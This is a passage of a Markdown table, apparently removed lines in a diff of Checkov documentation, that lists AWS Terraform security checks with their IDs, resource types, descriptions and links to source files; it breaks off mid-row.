-| 485 | CKV_AWS_345 | resource | aws_networkfirewall_rule_group | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | -| 486 | CKV_AWS_346 | resource | aws_networkfirewall_firewall_policy | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK) | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py) | -| 487 | CKV_AWS_347 | resource | aws_neptune_cluster | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py) | -| 488 | CKV_AWS_348 | resource | aws_iam_access_key | Ensure IAM root user doesnt have Access keys | Terraform | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py) | -| 489 | CKV_AWS_349 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts local disks | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py) | -| 490 | CKV_AWS_350 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts EBS disks | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py) | -| 491 | CKV_AWS_351 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts InTransit | Terraform | 
[EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py) | -| 492 | CKV_AWS_352 | resource | aws_network_acl_rule | Ensure NACL ingress does not allow all Ports | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py) | -| 493 | CKV_AWS_353 | resource | aws_db_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | -| 494 | CKV_AWS_353 | resource | aws_rds_cluster_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | -| 495 | CKV_AWS_354 | resource | aws_db_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | -| 496 | CKV_AWS_354 | resource | aws_rds_cluster_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | -| 497 | CKV_AWS_355 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 498 | CKV_AWS_355 | resource | 
aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 499 | CKV_AWS_355 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 500 | CKV_AWS_355 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 501 | CKV_AWS_355 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 502 | CKV_AWS_356 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py) | -| 503 | CKV_AWS_357 | resource | aws_transfer_server | Ensure Transfer Server allows only secure protocols | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py) | -| 504 | CKV_AWS_358 | data | aws_iam_policy_document | Ensure GitHub Actions OIDC trust policies only allows actions 
from a specific known organization | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py) | -| 505 | CKV_AWS_359 | resource | aws_neptune_cluster | Neptune DB clusters should have IAM database authentication enabled | Terraform | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py) | -| 506 | CKV_AWS_360 | resource | aws_docdb_cluster | Ensure DocumentDB has an adequate backup retention period | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py) | -| 507 | CKV_AWS_361 | resource | aws_neptune_cluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 508 | CKV_AWS_362 | resource | aws_neptune_cluster | Neptune DB clusters should be configured to copy tags to snapshots | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py) | -| 509 | CKV_AWS_363 | resource | aws_lambda_function | Ensure Lambda Runtime is not deprecated | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 510 | CKV_AWS_364 | resource | aws_lambda_permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Terraform | 
[LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py) | -| 511 | CKV_AWS_365 | resource | aws_ses_configuration_set | Ensure SES Configuration Set enforces TLS usage | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py) | -| 512 | CKV2_AWS_1 | resource | aws_network_acl | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | -| 513 | CKV2_AWS_1 | resource | aws_subnet | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | -| 514 | CKV2_AWS_2 | resource | aws_ebs_volume | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | -| 515 | CKV2_AWS_2 | resource | aws_volume_attachment | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | -| 516 | CKV2_AWS_3 | resource | aws_guardduty_detector | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | -| 517 | CKV2_AWS_3 | resource | aws_guardduty_organization_configuration | Ensure GuardDuty is enabled to specific org/region | Terraform | 
[GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | -| 518 | CKV2_AWS_4 | resource | aws_api_gateway_method_settings | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | -| 519 | CKV2_AWS_4 | resource | aws_api_gateway_stage | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | -| 520 | CKV2_AWS_5 | resource | aws_security_group | Ensure that Security Groups are attached to another resource | Terraform | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml) | -| 521 | CKV2_AWS_6 | resource | aws_s3_bucket | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | -| 522 | CKV2_AWS_6 | resource | aws_s3_bucket_public_access_block | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | -| 523 | CKV2_AWS_7 | resource | aws_emr_cluster | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | -| 524 | CKV2_AWS_7 | resource | aws_security_group | Ensure 
that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | -| 525 | CKV2_AWS_8 | resource | aws_rds_cluster | Ensure that RDS clusters has backup plan of AWS Backup | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml) | -| 526 | CKV2_AWS_9 | resource | aws_backup_selection | Ensure that EBS are added in the backup plans of AWS Backup | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml) | -| 527 | CKV2_AWS_10 | resource | aws_cloudtrail | Ensure CloudTrail trails are integrated with CloudWatch Logs | Terraform | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml) | -| 528 | CKV2_AWS_11 | resource | aws_vpc | Ensure VPC flow logging is enabled in all VPCs | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml) | -| 529 | CKV2_AWS_12 | resource | aws_default_security_group | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | -| 530 | CKV2_AWS_12 | resource | aws_vpc | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | -| 531 | CKV2_AWS_14 | resource | aws_iam_group | Ensure that IAM groups includes at least one IAM user | Terraform | 
[IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | -| 532 | CKV2_AWS_14 | resource | aws_iam_group_membership | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | -| 533 | CKV2_AWS_15 | resource | aws_autoscaling_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 534 | CKV2_AWS_15 | resource | aws_elb | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 535 | CKV2_AWS_15 | resource | aws_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. 
| Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 536 | CKV2_AWS_16 | resource | aws_appautoscaling_target | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | -| 537 | CKV2_AWS_16 | resource | aws_dynamodb_table | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | -| 538 | CKV2_AWS_18 | resource | aws_backup_selection | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml) | -| 539 | CKV2_AWS_19 | resource | aws_eip | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | -| 540 | CKV2_AWS_19 | resource | aws_eip_association | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | -| 541 | CKV2_AWS_20 | resource | aws_alb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 542 | CKV2_AWS_20 | 
resource | aws_alb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 543 | CKV2_AWS_20 | resource | aws_lb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 544 | CKV2_AWS_20 | resource | aws_lb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 545 | CKV2_AWS_21 | resource | aws_iam_group_membership | Ensure that all IAM users are members of at least one IAM group. | Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml) | -| 546 | CKV2_AWS_22 | resource | aws_iam_user | Ensure an IAM User does not have access to the console | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml) | -| 547 | CKV2_AWS_23 | resource | aws_route53_record | Route53 A Record has Attached Resource | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml) | -| 548 | CKV2_AWS_27 | resource | aws_rds_cluster | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | -| 549 | CKV2_AWS_27 | 
resource | aws_rds_cluster_parameter_group | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | -| 550 | CKV2_AWS_28 | resource | aws_alb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | -| 551 | CKV2_AWS_28 | resource | aws_lb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | -| 552 | CKV2_AWS_29 | resource | aws_api_gateway_rest_api | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | -| 553 | CKV2_AWS_29 | resource | aws_api_gateway_stage | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | -| 554 | CKV2_AWS_30 | resource | aws_db_instance | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | -| 555 | CKV2_AWS_30 | resource | aws_db_parameter_group | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | -| 556 | CKV2_AWS_31 | resource | aws_wafv2_web_acl | Ensure WAF2 
has a Logging Configuration | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml) | -| 557 | CKV2_AWS_32 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a response headers policy attached | Terraform | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml) | -| 558 | CKV2_AWS_33 | resource | aws_appsync_graphql_api | Ensure AppSync is protected by WAF | Terraform | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml) | -| 559 | CKV2_AWS_34 | resource | aws_ssm_parameter | AWS SSM Parameter should be Encrypted | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml) | -| 560 | CKV2_AWS_35 | resource | aws_route | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | -| 561 | CKV2_AWS_35 | resource | aws_route_table | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | -| 562 | CKV2_AWS_36 | resource | aws_ssm_parameter | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | -| 563 | CKV2_AWS_36 | resource | data.http | Ensure terraform is not sending SSM 
secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | -| 564 | CKV2_AWS_37 | resource | aws | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 565 | CKV2_AWS_37 | resource | aws_accessanalyzer_analyzer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 566 | CKV2_AWS_37 | resource | aws_acm_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 567 | CKV2_AWS_37 | resource | aws_acm_certificate_validation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 568 | CKV2_AWS_37 | resource | aws_acmpca_certificate_authority | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 569 | CKV2_AWS_37 | resource | aws_ami | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 570 | CKV2_AWS_37 | resource | aws_ami_copy | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 571 | CKV2_AWS_37 | resource | aws_ami_from_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 572 | CKV2_AWS_37 | resource | aws_ami_launch_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 573 | CKV2_AWS_37 | resource | aws_api_gateway_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 574 | CKV2_AWS_37 | resource | aws_api_gateway_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 575 | CKV2_AWS_37 | resource | aws_api_gateway_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 576 | CKV2_AWS_37 | resource | aws_api_gateway_base_path_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 577 | 
CKV2_AWS_37 | resource | aws_api_gateway_client_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 578 | CKV2_AWS_37 | resource | aws_api_gateway_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 579 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_part | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 580 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 581 | CKV2_AWS_37 | resource | aws_api_gateway_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 582 | CKV2_AWS_37 | resource | aws_api_gateway_gateway_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 583 | CKV2_AWS_37 | resource | aws_api_gateway_integration | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 584 | CKV2_AWS_37 | resource | aws_api_gateway_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 585 | CKV2_AWS_37 | resource | aws_api_gateway_method | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 586 | CKV2_AWS_37 | resource | aws_api_gateway_method_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 587 | CKV2_AWS_37 | resource | aws_api_gateway_method_settings | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 588 | CKV2_AWS_37 | resource | aws_api_gateway_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 589 | CKV2_AWS_37 | resource | 